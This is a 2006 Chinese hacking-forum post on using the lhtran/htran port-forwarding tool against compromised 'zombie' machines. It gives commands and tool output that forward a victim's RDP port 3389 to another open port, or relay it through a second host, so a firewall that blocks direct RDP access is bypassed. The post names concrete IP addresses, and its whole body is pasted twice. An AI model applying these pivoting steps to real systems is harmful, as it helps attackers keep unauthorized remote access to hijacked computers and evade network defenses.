Lhtran 的2个技巧
时间:2006-11-10 来源:tthacker
lhtran的2个技巧
今天打算强化下lhtran的功能,如果一台外网肉鸡开了3389,外部不允许访问此端口,
但允许访问其他的端口,这时候就可以把肉鸡的3389转发到它本机的其他一个可以被
访问的端口,比如61,然后攻击者连接它的61端口就相当于访问它的3389了。但发现
可以用lhtran的-tran选项来完成此功能: 在肉鸡上执行: ./htran -tran 61 127.0.0.1 3389 如此一来,只要连接肉鸡的61端口,就可访问它的3389资源了。 ////////////////////////////////////////////////////////////////////////// 进而又想到,可以把肉鸡的3389重定向到远程主机的某个端口。原理如下: 把肉鸡 61.139.121.153的3389先转发到它本机的60端口,然后在本机(或者另一台肉鸡)
监听61端口,并去连接肉鸡 61.139.121.153的60,这样肉鸡的60在和本机的61转发就ok了,
实际上是做了2次转发: 测试环境: 外网肉鸡:61.139.121.153,本机(或者另一台肉鸡):124.123.55.66 1),在外网肉鸡上执行:./lhtran -tran 60 127.0.0.1 3389 $ ./lhtran -tran 60 127.0.0.1 3389
[+] Listen on port 60 ok. 2),在本机执行:./lhtran -tran 61 61.139.121.153 60 $ ./lhtran -tran 60 127.0.0.1 3389
[+] Listen on port 60 ok. 此时连接本机(或者另一台肉鸡)的61端口,就把61.139.121.153的3389,转到
124.123.55.66的61端口了。 也有更简单的做法,就是直接在本机执行:./lhtran -tran 61 61.139.121.153 3389
此时连接本机的61就可以访问肉鸡的3389,这种做法跟http代理服务器是一样的道理。
但正如前面所说的,如果肉机不允许直接访问3389的话,就可以用上面那个复杂的方法
试试。 ///////////////////////////////////////////////////////////////////////////
但允许访问其他的端口,这时候就可以把肉鸡的3389转发到它本机的其他一个可以被
访问的端口,比如61,然后攻击者连接它的61端口就相当于访问它的3389了。但发现
可以用lhtran的-tran选项来完成此功能: 在肉鸡上执行: ./htran -tran 61 127.0.0.1 3389 如此一来,只要连接肉鸡的61端口,就可访问它的3389资源了。 ////////////////////////////////////////////////////////////////////////// 进而又想到,可以把肉鸡的3389重定向到远程主机的某个端口。原理如下: 把肉鸡 61.139.121.153的3389先转发到它本机的60端口,然后在本机(或者另一台肉鸡)
监听61端口,并去连接肉鸡 61.139.121.153的60,这样肉鸡的60在和本机的61转发就ok了,
实际上是做了2次转发: 测试环境: 外网肉鸡:61.139.121.153,本机(或者另一台肉鸡):124.123.55.66 1),在外网肉鸡上执行:./lhtran -tran 60 127.0.0.1 3389 $ ./lhtran -tran 60 127.0.0.1 3389
[+] Listen on port 60 ok. 2),在本机执行:./lhtran -tran 61 61.139.121.153 60 $ ./lhtran -tran 60 127.0.0.1 3389
[+] Listen on port 60 ok. 此时连接本机(或者另一台肉鸡)的61端口,就把61.139.121.153的3389,转到
124.123.55.66的61端口了。 也有更简单的做法,就是直接在本机执行:./lhtran -tran 61 61.139.121.153 3389
此时连接本机的61就可以访问肉鸡的3389,这种做法跟http代理服务器是一样的道理。
但正如前面所说的,如果肉机不允许直接访问3389的话,就可以用上面那个复杂的方法
试试。 ///////////////////////////////////////////////////////////////////////////
相关阅读 更多 +
